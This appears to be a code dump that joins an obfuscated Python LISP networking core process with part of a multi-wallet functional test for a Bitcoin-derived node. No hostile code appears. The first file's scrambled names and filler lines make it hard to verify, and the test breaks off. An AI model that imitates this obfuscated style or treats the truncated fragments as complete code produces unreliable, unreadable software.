if 13 - 13: II111iiii / OoOoOO00 / OoOoOO00 + ooOoO0o
def Ii1i ( ) :
lisp . lisp_set_exception ( )
ooooOoOooo00Oo = 60
if 72 - 72: I11i
while ( True ) :
time . sleep ( ooooOoOooo00Oo )
if 26 - 26: IiII % Oo0Ooo
OoOOoo = [ ]
II1ii1 = lisp . lisp_get_timestamp ( )
if 34 - 34: OoOoOO00 - oO0o * OoooooooOO
if 5 - 5: i11iIiiIii * iII111i - Ii1I - I1ii11iIi11i - i1IIi + iII111i
if 4 - 4: ooOoO0o + O0 . i1IIi * I1ii11iIi11i - o0oOOo0O0Ooo
if 42 - 42: o0oOOo0O0Ooo * OoOoOO00 . OoO0O00 - iII111i / II111iiii
for iii1I1Iii in lisp . lisp_info_sources_by_address :
OoooOO0Oo0 = lisp . lisp_info_sources_by_address [ iii1I1Iii ]
if ( OoooOO0Oo0 . no_timeout ) : continue
if ( OoooOO0Oo0 . uptime + ooooOoOooo00Oo < II1ii1 ) : continue
if 25 - 25: Oo0Ooo % OoOoOO00
OoOOoo . append ( iii1I1Iii )
if 75 - 75: i1IIi
O0OOO0 = OoooOO0Oo0 . nonce
if ( O0OOO0 == None ) : continue
if ( O0OOO0 in lisp . lisp_info_sources_by_nonce ) :
lisp . lisp_info_sources_by_nonce . pop ( O0OOO0 )
if 74 - 74: Oo0Ooo + I1Ii111 - oO0o - OoO0O00 + iII111i - iIii1I11I1II1
if 54 - 54: I1ii11iIi11i + II111iiii . I1IiiI / OoO0O00 . ooOoO0o
if 58 - 58: IiII % i11iIiiIii * II111iiii . I1ii11iIi11i
if 94 - 94: i11iIiiIii . OOooOOo + iIii1I11I1II1 * I1Ii111 * I1Ii111
if 36 - 36: I11i - IiII . IiII
if 60 - 60: i11iIiiIii * Oo0Ooo % OoO0O00 + OoO0O00
for iii1I1Iii in OoOOoo :
lisp . lisp_info_sources_by_address . pop ( iii1I1Iii )
if 84 - 84: iIii1I11I1II1 + OoooooooOO
if 77 - 77: O0 * I1ii11iIi11i * oO0o + OoO0O00 + I1ii11iIi11i - I1Ii111
return
if 10 - 10: I1ii11iIi11i + IiII
if 58 - 58: I1IiiI + OoooooooOO / iII111i . ooOoO0o % o0oOOo0O0Ooo / I1ii11iIi11i
if 62 - 62: II111iiii
if 12 - 12: IiII + II111iiii
if 92 - 92: I1Ii111 % iIii1I11I1II1 - iII111i / i11iIiiIii % ooOoO0o * o0oOOo0O0Ooo
if 80 - 80: iII111i
if 3 - 3: I1ii11iIi11i * I11i
if 53 - 53: iIii1I11I1II1 / iII111i % OoO0O00 + IiII / ooOoO0o
def oo00oO ( lisp_ipc_control_socket , lisp_sockets ) :
lisp . lisp_set_exception ( )
while ( True ) :
try : I11i1I11 = lisp_ipc_control_socket . recvfrom ( 9000 )
except : return ( [ "" , "" , "" , "" ] )
IIIi1i1I = I11i1I11 [ 0 ] . split ( "@" )
ooo0O = I11i1I11 [ 1 ]
if 32 - 32: IiII - oO0o . iIii1I11I1II1 . I1Ii111 + II111iiii % OoooooooOO
iIii = IIIi1i1I [ 0 ]
i1IiI1ii1i = IIIi1i1I [ 1 ]
oOoO0o00OO0 = int ( IIIi1i1I [ 2 ] )
Oo000 = IIIi1i1I [ 3 : : ]
if 75 - 75: O0
if ( len ( Oo000 ) > 1 ) :
Oo000 = lisp . lisp_bit_stuff ( Oo000 )
else :
Oo000 = Oo000 [ 0 ]
if 56 - 56: OoO0O00 / II111iiii
if 39 - 39: OoOoOO00 - OoooooooOO - i1IIi / II111iiii
if ( iIii != "control-packet" ) :
lisp . lprint ( ( "lisp_core_control_packet_process() received" + "unexpected control-packet, message ignored" ) )
if 49 - 49: Oo0Ooo + O0 + IiII . II111iiii % ooOoO0o
continue
if 33 - 33: OoOoOO00 . iIii1I11I1II1 / I11i % Ii1I
if 49 - 49: OoO0O00 + II111iiii / IiII - O0 % Ii1I
lisp . lprint ( ( "{} {} bytes from {}, dest/port: {}/{}, control-" + "packet: {}" ) . format ( lisp . bold ( "Receive" , False ) , len ( Oo000 ) ,
# Oo0Ooo / OoO0O00
ooo0O , i1IiI1ii1i , oOoO0o00OO0 , lisp . lisp_format_packet ( Oo000 ) ) )
if 40 - 40: I11i / iII111i + OoO0O00 / OoooooooOO - oO0o / I1Ii111
if 62 - 62: i11iIiiIii - I11i
if 81 - 81: I11i
if 92 - 92: OOooOOo - Oo0Ooo - OoooooooOO / IiII - i1IIi
if 81 - 81: i1IIi / I1Ii111 % i11iIiiIii . iIii1I11I1II1 * OoOoOO00 + OoooooooOO
if 31 - 31: i1IIi % II111iiii
I1ii1II1iII = lisp . lisp_control_header ( )
I1ii1II1iII . decode ( Oo000 )
if ( I1ii1II1iII . type == lisp . LISP_MAP_REPLY ) :
i1I1i1i1I1 = lisp . lisp_map_reply ( )
i1I1i1i1I1 . decode ( Oo000 )
if ( iiIIIIiI111 ( None , 0 , i1I1i1i1I1 . nonce ) ) :
oooO0o ( lisp_sockets , ooo0O , oOoO0o00OO0 , Oo000 )
continue
if 13 - 13: iIii1I11I1II1 - II111iiii % O0 . Ii1I % OoO0O00
if 2 - 2: OoooooooOO - Ii1I % oO0o / I1IiiI / o0oOOo0O0Ooo
if 3 - 3: II111iiii / OOooOOo
if 48 - 48: ooOoO0o . I1ii11iIi11i
if 49 - 49: i1IIi - OoOoOO00 . Oo0Ooo + iIii1I11I1II1 - ooOoO0o / Oo0Ooo
if 24 - 24: oO0o - iII111i / ooOoO0o
if 10 - 10: OoOoOO00 * i1IIi
if 15 - 15: I11i + i1IIi - II111iiii % I1IiiI
if ( I1ii1II1iII . type == lisp . LISP_MAP_NOTIFY and ooo0O == "lisp-etr" ) :
Oo0O00Oo0o0 = lisp . lisp_packet_ipc ( Oo000 , ooo0O , oOoO0o00OO0 )
lisp . lisp_ipc ( Oo0O00Oo0o0 , Oo , "lisp-itr" )
continue
if 34 - 34: I1IiiI
if 57 - 57: OOooOOo . Ii1I % o0oOOo0O0Ooo
if 32 - 32: I11i / IiII - O0 * iIii1I11I1II1
if 70 - 70: OoooooooOO % OoooooooOO % OoO0O00
if 98 - 98: OoO0O00
if 18 - 18: I11i + Oo0Ooo - OoO0O00 / I1Ii111 / OOooOOo
if 53 - 53: OOooOOo + o0oOOo0O0Ooo . oO0o / I11i
OoooOo0 = lisp . lisp_convert_4to6 ( i1IiI1ii1i )
OoooOo0 = lisp . lisp_address ( lisp . LISP_AFI_IPV6 , "" , 128 , 0 )
if ( OoooOo0 . is_ipv4_string ( i1IiI1ii1i ) ) : i1IiI1ii1i = "::ffff:" + i1IiI1ii1i
OoooOo0 . store_address ( i1IiI1ii1i )
if 52 - 52: I1Ii111 + I1Ii111
if 73 - 73: o0oOOo0O0Ooo . i11iIiiIii % OoooooooOO + ooOoO0o . OoooooooOO / OOooOOo
if 54 - 54: OoOoOO00 . OoooooooOO
if 36 - 36: oO0o / II111iiii * IiII % I1ii11iIi11i
lisp . lisp_send ( lisp_sockets , OoooOo0 , oOoO0o00OO0 , Oo000 )
if 31 - 31: II111iiii + OOooOOo - OoooooooOO . I11i
return
if 28 - 28: Ii1I . I1ii11iIi11i
if 77 - 77: I1ii11iIi11i % II111iiii
if 81 - 81: OoOoOO00 % Ii1I / O0 * iIii1I11I1II1 % IiII . I1IiiI
if 90 - 90: o0oOOo0O0Ooo
if 44 - 44: o0oOOo0O0Ooo / I1ii11iIi11i . Oo0Ooo + OoOoOO00
if 32 - 32: IiII - ooOoO0o * iII111i * I11i
if 84 - 84: Ii1I + I1ii11iIi11i % I1IiiI + i11iIiiIii
if 37 - 37: I11i % I1ii11iIi11i / ooOoO0o
def iI11I ( ) :
Oo0O0oooo = open ( "./lisp.config.example" , "r" ) ; I111iI = Oo0O0oooo . read ( ) ; Oo0O0oooo . close ( )
Oo0O0oooo = open ( "./lisp.config" , "w" )
I111iI = I111iI . split ( "\n" )
for OooOO in I111iI :
Oo0O0oooo . write ( OooOO + "\n" )
if ( OooOO [ 0 ] == "#" and OooOO [ - 1 ] == "#" and len ( OooOO ) >= 4 ) :
o0oO = OooOO [ 1 : - 2 ]
ooOo0 = len ( o0oO ) * "-"
if ( o0oO == ooOo0 ) : break
if 61 - 61: II111iiii
if 48 - 48: OOooOOo
Oo0O0oooo . close ( )
return
if 26 - 26: iII111i * I1Ii111 * oO0o * OoOoOO00
if 48 - 48: iII111i % i11iIiiIii . OoooooooOO * IiII % OoO0O00 . iII111i
if 6 - 6: O0 . ooOoO0o - oO0o / i11iIiiIii
if 84 - 84: I11i / I1ii11iIi11i * o0oOOo0O0Ooo * OoO0O00 * OOooOOo * O0
if 83 - 83: O0 % II111iiii + o0oOOo0O0Ooo / OoooooooOO
if 75 - 75: II111iiii . I1IiiI + OOooOOo - OoOoOO00 - O0 . I11i
if 19 - 19: Ii1I * i1IIi % O0 + I11i
if 25 - 25: I1Ii111 - Ii1I / O0 . OoooooooOO % I1IiiI . i1IIi
def Ii1iIIII1i ( bottle_port ) :
global Oo0o
global Ii1iI
global Oo
global I1Ii11I1Ii1i
global Ooo
global o0oOoO00o
if 84 - 84: i1IIi - I1IiiI % iII111i
lisp . lisp_i_am ( "core" )
lisp . lisp_set_exception ( )
lisp . lisp_print_banner ( "core-process starting up" )
lisp . lisp_uptime = lisp . lisp_get_timestamp ( )
lisp . lisp_version = commands . getoutput ( "cat lisp-version.txt" )
Oo0o = commands . getoutput ( "cat lisp-build-date.txt" )
if 80 - 80: o0oOOo0O0Ooo % iII111i
if 80 - 80: Ii1I
if 26 - 26: iIii1I11I1II1 . OoooooooOO - iIii1I11I1II1
if 59 - 59: I1ii11iIi11i + I11i . oO0o
if ( lisp . lisp_get_local_addresses ( ) == False ) : return ( False )
if 87 - 87: OoO0O00
if 34 - 34: I1Ii111 . OoOoOO00 / i11iIiiIii / iII111i
if 46 - 46: Oo0Ooo + II111iiii * I1IiiI + OOooOOo
if 31 - 31: Ii1I * o0oOOo0O0Ooo * Ii1I + OoO0O00 * o0oOOo0O0Ooo . I1Ii111
if 89 - 89: OoooooooOO * Ii1I * I1IiiI . ooOoO0o * Ii1I / iII111i
lisp . lisp_ipc_lock = multiprocessing . Lock ( )
if 46 - 46: i11iIiiIii
if 15 - 15: O0 / i1IIi / i1IIi . iII111i % OoOoOO00 + I1IiiI
if 48 - 48: I1Ii111 % iII111i % Ii1I % iIii1I11I1II1 . Ii1I
if 14 - 14: iII111i * OoO0O00 % O0 + I11i + I1ii11iIi11i
if 23 - 23: Oo0Ooo % iII111i + Ii1I - I1Ii111
if 65 - 65: OoooooooOO
if 22 - 22: OOooOOo + II111iiii + Oo0Ooo
if ( os . path . exists ( "lisp.py" ) ) : lisp . lisp_version += "+"
if 83 - 83: ooOoO0o
if 43 - 43: OOooOOo
if 84 - 84: OOooOOo . IiII . iII111i
if 2 - 2: Oo0Ooo - OoOoOO00
if 49 - 49: Ii1I + II111iiii / oO0o - OoOoOO00 % OoOoOO00 + I1IiiI
if 54 - 54: ooOoO0o % Oo0Ooo - OOooOOo
iIi11IiiiII11 = "0.0.0.0" if lisp . lisp_is_raspbian ( ) else "0::0"
if ( os . getenv ( "LISP_ANYCAST_MR" ) == None or lisp . lisp_myrlocs [ 0 ] == None ) :
Ii1iI = lisp . lisp_open_listen_socket ( iIi11IiiiII11 ,
str ( lisp . LISP_CTRL_PORT ) )
else :
iIi11IiiiII11 = lisp . lisp_myrlocs [ 0 ] . print_address_no_iid ( )
Ii1iI = lisp . lisp_open_listen_socket ( iIi11IiiiII11 ,
str ( lisp . LISP_CTRL_PORT ) )
if 26 - 26: iII111i / OoooooooOO - Oo0Ooo
lisp . lprint ( "Listen on {}, port 4342" . format ( iIi11IiiiII11 ) )
if 2 - 2: I1ii11iIi11i - Oo0Ooo
if 4 - 4: O0 / I11i . OoO0O00 - ooOoO0o / OOooOOo
if 25 - 25: I11i * OoOoOO00 - Oo0Ooo . ooOoO0o . oO0o
if 89 - 89: O0 * I11i * OoO0O00
if 3 - 3: OOooOOo / iII111i * iIii1I11I1II1 + II111iiii / o0oOOo0O0Ooo / IiII
if 25 - 25: OoOoOO00 + OoO0O00 % Ii1I % OOooOOo / oO0o
if ( lisp . lisp_external_data_plane ( ) == False ) :
o0oOoO00o = lisp . lisp_open_listen_socket ( iIi11IiiiII11 ,
str ( lisp . LISP_DATA_PORT ) )
lisp . lprint ( "Listen on {}, port 4341" . format ( iIi11IiiiII11 ) )
if 91 - 91: OoO0O00 / OoO0O00 . II111iiii . ooOoO0o - I1IiiI
if 23 - 23: I1IiiI
if 7 - 7: iII111i % I1ii11iIi11i
if 64 - 64: I1Ii111 + i11iIiiIii
if 35 - 35: OoOoOO00 + i1IIi % OOooOOo
if 68 - 68: IiII . ooOoO0o
Oo = lisp . lisp_open_send_socket ( "lisp-core" , "" )
Oo . settimeout ( 3 )
if 64 - 64: i1IIi + Oo0Ooo * I1IiiI / OOooOOo
if 3 - 3: Oo0Ooo / ooOoO0o + ooOoO0o . I1ii11iIi11i
if 50 - 50: iIii1I11I1II1 * oO0o
if 85 - 85: i1IIi
if 100 - 100: OoooooooOO / I11i % OoO0O00 + Ii1I
I1Ii11I1Ii1i = lisp . lisp_open_listen_socket ( "" , "lisp-core-pkt" )
if 42 - 42: Oo0Ooo / IiII . Ii1I * I1IiiI
Ooo = [ Ii1iI , Ii1iI ,
Oo ]
if 54 - 54: OoOoOO00 * iII111i + OoO0O00
if 93 - 93: o0oOOo0O0Ooo / I1IiiI
if 47 - 47: Oo0Ooo * OOooOOo
if 98 - 98: oO0o - oO0o . ooOoO0o
if 60 - 60: I1IiiI * I1ii11iIi11i / O0 + I11i + IiII
threading . Thread ( target = oo00oO ,
args = [ I1Ii11I1Ii1i , Ooo ] ) . start ( )
if 66 - 66: IiII * Oo0Ooo . OoooooooOO * I1Ii111
if 93 - 93: IiII / i1IIi
if 47 - 47: ooOoO0o - Ii1I
if 98 - 98: oO0o . I1Ii111 / OoOoOO00 . ooOoO0o
if 1 - 1: OOooOOo
if 87 - 87: O0 * II111iiii + iIii1I11I1II1 % oO0o % i11iIiiIii - OoOoOO00
if ( os . path . exists ( "./lisp.config" ) == False ) :
lisp . lprint ( ( "./lisp.config does not exist, creating a copy " + "from lisp.config.example" ) )
if 73 - 73: iII111i + Ii1I
iI11I ( )
if 37 - 37: oO0o - iIii1I11I1II1 + II111iiii . Ii1I % iIii1I11I1II1
if 17 - 17: I1Ii111 + i1IIi % O0
if 65 - 65: IiII
if 50 - 50: II111iiii / OoO0O00
if 79 - 79: I1ii11iIi11i - iIii1I11I1II1 % i1IIi / Oo0Ooo + II111iiii
if 95 - 95: oO0o
i11ii ( Ii1iI )
if 39 - 39: i1IIi . I1ii11iIi11i / I11i / I11i
threading . Thread ( target = lispconfig . lisp_config_process ,
args = [ Oo ] ) . start ( )
if 100 - 100: OoooooooOO - OoooooooOO + IiII
if 32 - 32: OoOoOO00 * o0oOOo0O0Ooo / OoooooooOO
if 90 - 90: I1Ii111
if 35 - 35: II111iiii / Ii1I
threading . Thread ( target = oOooOoOOo0O ,
args = [ bottle_port ] ) . start ( )
threading . Thread ( target = o00OIIIIIiiI , args = [ ] ) . start ( )
if 79 - 79: OoOoOO00 + I1Ii111 * iII111i * Ii1I
if 53 - 53: OOooOOo / Oo0Ooo
if 10 - 10: I1ii11iIi11i . o0oOOo0O0Ooo
if 75 - 75: O0 * i1IIi - I11i / OOooOOo % OOooOOo / OoOoOO00
threading . Thread ( target = O00Oo00OOoO0 ,
args = [ Oo ] ) . start ( )
if 5 - 5: O0 - iII111i / I1Ii111 . o0oOOo0O0Ooo
if 7 - 7: I1ii11iIi11i - OoOoOO00
if 54 - 54: oO0o / iIii1I11I1II1 / OoooooooOO . i1IIi - OoOoOO00
if 57 - 57: iIii1I11I1II1 * Ii1I * iII111i / oO0o
threading . Thread ( target = Ii1i ) . start ( )
return ( True )
if 46 - 46: Ii1I
if 61 - 61: o0oOOo0O0Ooo / ooOoO0o - II111iiii
if 87 - 87: I1ii11iIi11i / I1IiiI
if 45 - 45: OoOoOO00 * ooOoO0o / OoooooooOO + OoO0O00 . I1Ii111 / OoO0O00
if 64 - 64: Ii1I / i1IIi % I1IiiI - o0oOOo0O0Ooo
if 11 - 11: I1ii11iIi11i - OoooooooOO
if 16 - 16: IiII % OoooooooOO - ooOoO0o * Ii1I - Ii1I
def I1iiII1 ( ) :
if 45 - 45: OoO0O00 + OoO0O00 % ooOoO0o
if 36 - 36: Ii1I * I11i . I11i / Oo0Ooo / I1IiiI
if 80 - 80: OoooooooOO - i1IIi
if 51 - 51: i1IIi . OoOoOO00 / OoOoOO00 % i11iIiiIii * OOooOOo - I1Ii111
lisp . lisp_close_socket ( Oo , "lisp-core" )
lisp . lisp_close_socket ( I1Ii11I1Ii1i , "lisp-core-pkt" )
lisp . lisp_close_socket ( Ii1iI , "" )
lisp . lisp_close_socket ( o0oOoO00o , "" )
return
if 49 - 49: Oo0Ooo - iIii1I11I1II1
if 64 - 64: I1Ii111 + iIii1I11I1II1
if 14 - 14: Ii1I / OoooooooOO + II111iiii . O0 / i1IIi
if 58 - 58: o0oOOo0O0Ooo / i11iIiiIii / O0 % I11i % I1IiiI
if 86 - 86: IiII + OoOoOO00 / I1IiiI + I11i % I11i / i11iIiiIii
if 12 - 12: OoOoOO00 + o0oOOo0O0Ooo . I1Ii111
if 52 - 52: OoO0O00
if 4 - 4: Ii1I % I1ii11iIi11i + I11i - I1ii11iIi11i
if 98 - 98: Ii1I - O0 * oO0o * Ii1I * Ii1I
if 44 - 44: IiII + I11i
if 66 - 66: oO0o
if 34 - 34: iII111i % i11iIiiIii + i11iIiiIii - iII111i
def i11ii ( lisp_socket ) :
if 2 - 2: II111iiii + i1IIi
Oo0O0oooo = open ( "./lisp.config" , "r" ) ; I111iI = Oo0O0oooo . read ( ) ; Oo0O0oooo . close ( )
I111iI = I111iI . split ( "\n" )
if 68 - 68: OOooOOo + Ii1I
if 58 - 58: IiII * Ii1I . i1IIi
if 19 - 19: oO0o
if 85 - 85: ooOoO0o - I1IiiI / i1IIi / OoO0O00 / II111iiii
if 94 - 94: iIii1I11I1II1 + IiII
II11II = False
for OooOO in I111iI :
if ( OooOO [ 0 : 1 ] == "#-" and OooOO [ - 2 : - 1 ] == "-#" ) : break
if ( OooOO == "" or OooOO [ 0 ] == "#" ) : continue
if ( OooOO . find ( "decentralized-xtr = yes" ) == - 1 ) : continue
II11II = True
break
if 40 - 40: iII111i + O0
if ( II11II == False ) : return
if 18 - 18: iIii1I11I1II1 % iIii1I11I1II1 % oO0o + I1IiiI % ooOoO0o / Ii1I
if 36 - 36: OoOoOO00 . i11iIiiIii
if 81 - 81: Oo0Ooo * iII111i * OoO0O00
if 85 - 85: O0 * oO0o
if 39 - 39: II111iiii * I1IiiI - iIii1I11I1II1
Ii1 = [ ]
o0OOOoo0000 = False
for OooOO in I111iI :
if ( OooOO [ 0 : 1 ] == "#-" and OooOO [ - 2 : - 1 ] == "-#" ) : break
if ( OooOO == "" or OooOO [ 0 ] == "#" ) : continue
if 19 - 19: OoooooooOO . I1IiiI + I1Ii111 - I1IiiI / I1IiiI % IiII
if ( OooOO . find ( "lisp map-server" ) != - 1 ) :
o0OOOoo0000 = True
continue
if 4 - 4: i11iIiiIii * I1ii11iIi11i + OoooooooOO - IiII . ooOoO0o . iIii1I11I1II1
if ( OooOO [ 0 ] == "}" ) :
o0OOOoo0000 = False
continue
if 48 - 48: o0oOOo0O0Ooo * oO0o . I1IiiI - I1Ii111 + OOooOOo . Oo0Ooo
if 62 - 62: I11i + OoooooooOO * iIii1I11I1II1 / i1IIi * O0
if 10 - 10: iIii1I11I1II1 * OoooooooOO / OOooOOo
if 33 - 33: o0oOOo0O0Ooo % IiII - iIii1I11I1II1 % OOooOOo + I1Ii111 - i11iIiiIii
if 91 - 91: OoooooooOO . iIii1I11I1II1 / i11iIiiIii
if ( o0OOOoo0000 and OooOO . find ( "address = " ) != - 1 ) :
oOOOO = OooOO . split ( "address = " ) [ 1 ]
OoOOoo0 = int ( oOOOO . split ( "." ) [ 0 ] )
if ( OoOOoo0 >= 224 and OoOOoo0 < 240 ) : Ii1 . append ( oOOOO )
if 93 - 93: II111iiii * OoOoOO00 % o0oOOo0O0Ooo
if 67 - 67: o0oOOo0O0Ooo + Oo0Ooo . ooOoO0o - i1IIi . OoOoOO00
if ( oOOOO == [ ] ) : return
if 12 - 12: IiII / OoO0O00 / O0 * IiII
if 51 - 51: ooOoO0o * iII111i / i1IIi
if 2 - 2: oO0o + IiII . iII111i - i1IIi + I1Ii111
if 54 - 54: OoooooooOO . oO0o - iII111i
II1i111 = commands . getoutput ( 'ifconfig eth0 | egrep "inet "' )
if ( II1i111 == "" ) : return
oO0o00o000Oo0 = II1i111 . split ( ) [ 1 ]
if 1 - 1: I1IiiI - I1Ii111
if 62 - 62: OoO0O00 . iII111i . iII111i % i1IIi * oO0o % Oo0Ooo
if 20 - 20: ooOoO0o . IiII / I11i . OoooooooOO * OOooOOo + Ii1I
if 2 - 2: I1IiiI
I1i111iiIIIi = socket . inet_aton ( oO0o00o000Oo0 )
for oOOOO in Ii1 :
lisp_socket . setsockopt ( socket . SOL_SOCKET , socket . SO_REUSEADDR , 1 )
lisp_socket . setsockopt ( socket . IPPROTO_IP , socket . IP_MULTICAST_IF , I1i111iiIIIi )
IIii1Ii = socket . inet_aton ( oOOOO ) + I1i111iiIIIi
lisp_socket . setsockopt ( socket . IPPROTO_IP , socket . IP_ADD_MEMBERSHIP , IIii1Ii )
lisp . lprint ( "Setting multicast listen socket for group {}" . format ( oOOOO ) )
if 98 - 98: II111iiii + Oo0Ooo * iIii1I11I1II1 * I1ii11iIi11i + OOooOOo * Ii1I
if 76 - 76: ooOoO0o . oO0o
return
if 60 - 60: OOooOOo * ooOoO0o * OoO0O00
if 64 - 64: I11i / II111iiii / OoO0O00 - ooOoO0o * iIii1I11I1II1 . iII111i
if 25 - 25: OOooOOo - Ii1I . I11i
if 57 - 57: o0oOOo0O0Ooo + Oo0Ooo * I1ii11iIi11i - ooOoO0o % iIii1I11I1II1 - Ii1I
III1I11II11I = int ( sys . argv [ 1 ] ) if ( len ( sys . argv ) > 1 ) else 8080
if 78 - 78: I1ii11iIi11i . I1Ii111 . I1Ii111 . I11i % iII111i
if 26 - 26: ooOoO0o + OoO0O00 / OoOoOO00 . II111iiii * Ii1I
if 21 - 21: I1IiiI - I1IiiI + iII111i % I1IiiI * oO0o
if 74 - 74: iII111i / I11i . I1IiiI - OoooooooOO + II111iiii + I11i
if ( Ii1iIIII1i ( III1I11II11I ) == False ) :
lisp . lprint ( "lisp_core_startup() failed" )
lisp . lisp_print_banner ( "lisp-core abnormal exit" )
exit ( 1 )
if 36 - 36: Ii1I * I1IiiI * I1ii11iIi11i . I11i * I1ii11iIi11i
if 76 - 76: OOooOOo + O0 / IiII - OoO0O00
while ( True ) :
if 27 - 27: Oo0Ooo - iIii1I11I1II1 * iII111i * II111iiii * I1ii11iIi11i
if 9 - 9: i11iIiiIii + OOooOOo - OoOoOO00 / ooOoO0o % i1IIi / oO0o
if 22 - 22: i1IIi
if 3 - 3: OoO0O00 * I1ii11iIi11i - iII111i + I1ii11iIi11i
if 63 - 63: I11i * ooOoO0o % II111iiii % I1Ii111 + I1IiiI * Oo0Ooo
iIii , ooo0O , oOoO0o00OO0 , Oo000 = lisp . lisp_receive ( Ii1iI , False )
if 96 - 96: IiII
if ( ooo0O == "" ) : break
if 99 - 99: iIii1I11I1II1 - ooOoO0o
if 79 - 79: I1IiiI + oO0o % I11i % oO0o
if 56 - 56: I1ii11iIi11i + oO0o . OoO0O00 + OoooooooOO * I1ii11iIi11i - O0
if 35 - 35: OOooOOo . I11i . I1Ii111 - I11i % I11i + I1Ii111
ooo0O = lisp . lisp_convert_6to4 ( ooo0O )
oooO0o ( Ooo , ooo0O , oOoO0o00OO0 , Oo000 )
if 99 - 99: o0oOOo0O0Ooo + OOooOOo
if 34 - 34: I1Ii111 * o0oOOo0O0Ooo . I1IiiI % i11iIiiIii
I1iiII1 ( )
lisp . lisp_print_banner ( "lisp-core normal exit" )
exit ( 0 )
if 61 - 61: iIii1I11I1II1 + oO0o * I11i - i1IIi % oO0o
if 76 - 76: oO0o / OoOoOO00
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
wallet_multiwallet.py
|
#!/usr/bin/env python3
# Copyright (c) 2017-2020 The Ludirium Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiwallet.
Verify that a ludiriumd node can load multiple wallet files
"""
from decimal import Decimal
from threading import Thread
import os
import shutil
import stat
import time
from test_framework.authproxy import JSONRPCException
from test_framework.blocktools import COINBASE_MATURITY
from test_framework.test_framework import LudiriumTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
get_rpc_proxy,
)
got_loading_error = False
def test_load_unload(node, name):
global got_loading_error
while True:
if got_loading_error:
return
try:
node.loadwallet(name)
node.unloadwallet(name)
except JSONRPCException as e:
if e.error['code'] == -4 and 'Wallet already loading' in e.error['message']:
got_loading_error = True
return
class MultiWalletTest(LudiriumTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.rpc_timeout = 120
self.extra_args = [["-nowallet"], []]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def add_options(self, parser):
parser.add_argument(
'--data_wallets_dir',
default=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/wallets/'),
help='Test data with wallet directories (default: %(default)s)',
)
def run_test(self):
node = self.nodes[0]
data_dir = lambda *p: os.path.join(node.datadir, self.chain, *p)
wallet_dir = lambda *p: data_dir('wallets', *p)
wallet = lambda name: node.get_wallet_rpc(name)
def wallet_file(name):
if name == self.default_wallet_name:
return wallet_dir(self.default_wallet_name, self.wallet_data_filename)
if os.path.isdir(wallet_dir(name)):
return wallet_dir(name, "wallet.dat")
return wallet_dir(name)
assert_equal(self.nodes[0].listwalletdir(), {'wallets': [{'name': self.default_wallet_name}]})
# check wallet.dat is created
self.stop_nodes()
assert_equal(os.path.isfile(wallet_dir(self.default_wallet_name, self.wallet_data_filename)), True)
# create symlink to verify wallet directory path can be referenced
# through symlink
os.mkdir(wallet_dir('w7'))
os.symlink('w7', wallet_dir('w7_symlink'))
os.symlink('..', wallet_dir('recursive_dir_symlink'))
os.mkdir(wallet_dir('self_walletdat_symlink'))
os.symlink('wallet.dat', wallet_dir('self_walletdat_symlink/wallet.dat'))
# rename wallet.dat to make sure plain wallet file paths (as opposed to
# directory paths) can be loaded
# create another dummy wallet for use in testing backups later
self.start_node(0)
node.createwallet("empty")
node.createwallet("plain")
node.createwallet("created")
self.stop_nodes()
empty_wallet = os.path.join(self.options.tmpdir, 'empty.dat')
os.rename(wallet_file("empty"), empty_wallet)
shutil.rmtree(wallet_dir("empty"))
empty_created_wallet = os.path.join(self.options.tmpdir, 'empty.created.dat')
os.rename(wallet_dir("created", self.wallet_data_filename), empty_created_wallet)
shutil.rmtree(wallet_dir("created"))
os.rename(wallet_file("plain"), wallet_dir("w8"))
shutil.rmtree(wallet_dir("plain"))
# restart node with a mix of wallet names:
# w1, w2, w3 - to verify new wallets created when non-existing paths specified
# w - to verify wallet name matching works when one wallet path is prefix of another
# sub/w5 - to verify relative wallet path is created correctly
# extern/w6 - to verify absolute wallet path is created correctly
# w7_symlink - to verify symlinked wallet path is initialized correctly
# w8 - to verify existing wallet file is loaded correctly. Not tested for SQLite wallets as this is a deprecated BDB behavior.
# '' - to verify default wallet file is created correctly
to_create = ['w1', 'w2', 'w3', 'w', 'sub/w5', 'w7_symlink']
in_wallet_dir = [w.replace('/', os.path.sep) for w in to_create] # Wallets in the wallet dir
in_wallet_dir.append('w7') # w7 is not loaded or created, but will be listed by listwalletdir because w7_symlink
to_create.append(os.path.join(self.options.tmpdir, 'extern/w6')) # External, not in the wallet dir, so we need to avoid adding it to in_wallet_dir
to_load = [self.default_wallet_name]
if not self.options.descriptors:
to_load.append('w8')
wallet_names = to_create + to_load # Wallet names loaded in the wallet
in_wallet_dir += to_load # The loaded wallets are also in the wallet dir
self.start_node(0)
for wallet_name in to_create:
self.nodes[0].createwallet(wallet_name)
for wallet_name in to_load:
self.nodes[0].loadwallet(wallet_name)
os.mkdir(wallet_dir('no_access'))
os.chmod(wallet_dir('no_access'), 0)
try:
with self.nodes[0].assert_debug_log(expected_msgs=['Error scanning']):
walletlist = self.nodes[0].listwalletdir()['wallets']
finally:
# Need to ensure access is restored for cleanup
os.chmod(wallet_dir('no_access'), stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
assert_equal(sorted(map(lambda w: w['name'], walletlist)), sorted(in_wallet_dir))
assert_equal(set(node.listwallets()), set(wallet_names))
# should raise rpc error if wallet path can't be created
err_code = -4 if self.options.descriptors else -1
assert_raises_rpc_error(err_code, "boost::filesystem::create_directory:", self.nodes[0].createwallet, "w8/bad")
# check that all requested wallets were created
self.stop_node(0)
for wallet_name in wallet_names:
assert_equal(os.path.isfile(wallet_file(wallet_name)), True)
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" does not exist')
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" is a relative path', cwd=data_dir())
self.nodes[0].assert_start_raises_init_error(['-walletdir=debug.log'], 'Error: Specified -walletdir "debug.log" is not a directory', cwd=data_dir())
self.start_node(0, ['-wallet=w1', '-wallet=w1'])
self.stop_node(0, 'Warning: Ignoring duplicate -wallet w1.')
if not self.options.descriptors:
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
